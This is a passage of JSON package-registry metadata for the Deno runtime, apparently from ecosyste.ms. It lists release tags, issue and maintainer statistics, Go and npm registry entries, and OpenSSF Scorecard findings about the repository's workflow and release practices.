ps://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-23T02:05:41.528Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":1,"rankings":{"downloads":null,"dependent_repos_count":4.716716996980181,"dependent_packages_count":9.552826830390176,"stargazers_count":0.005799652020878747,"forks_count":0.05449673019618823,"docker_downloads_count":null,"average":3.582460052396856},"purl":"pkg:golang/github.com/denoland/deno","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/denoland/deno","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/denoland/deno","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/denoland/deno/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fdenoland%2Fdeno/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fdenoland%2Fdeno/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fdenoland%2Fdeno/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fdenoland%2Fdeno/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fdenoland%2Fdeno/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fdenoland%2Fdeno/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2294064,"maintainers_count":0,"namespaces_count":839992,"keywords_count":126981,"github":"golang","metadata":{"funded_packages_count":76976,"sync_missing_packages_cursor":{"timestamp":"2026-09-08T00:00:42.079661Z","path":"github.com/KLAYTN/klaytn","version":"v1.4.0"},"rate_limit":1},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-09-08T05:01:04.071Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":11161880,"name":"@deno/darwin-arm64","ecosystem":"npm","description":"darwin-arm64 distribution of Deno","homepage":"https://deno.land","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":"deno","versions_count":96,"first_release_published_at":"2024-12-12T21:25:03.180Z","latest_release_published_at":"2026-08-27T17:36:06.866Z","latest_release_number":"2.9.6","last_synced_at":"2026-09-07T23:03:42.934Z","created_at":"2024-12-12T22:00:15.730Z","updated_at":"2026-09-07T23:03:42.935Z","registry_url":"https://www.npmjs.com/package/@deno/darwin-arm64","install_command":"npm install @deno/darwin-arm64","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"lts":"2.2.15","latest":"2.9.6"},"contentPolicy":null},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using 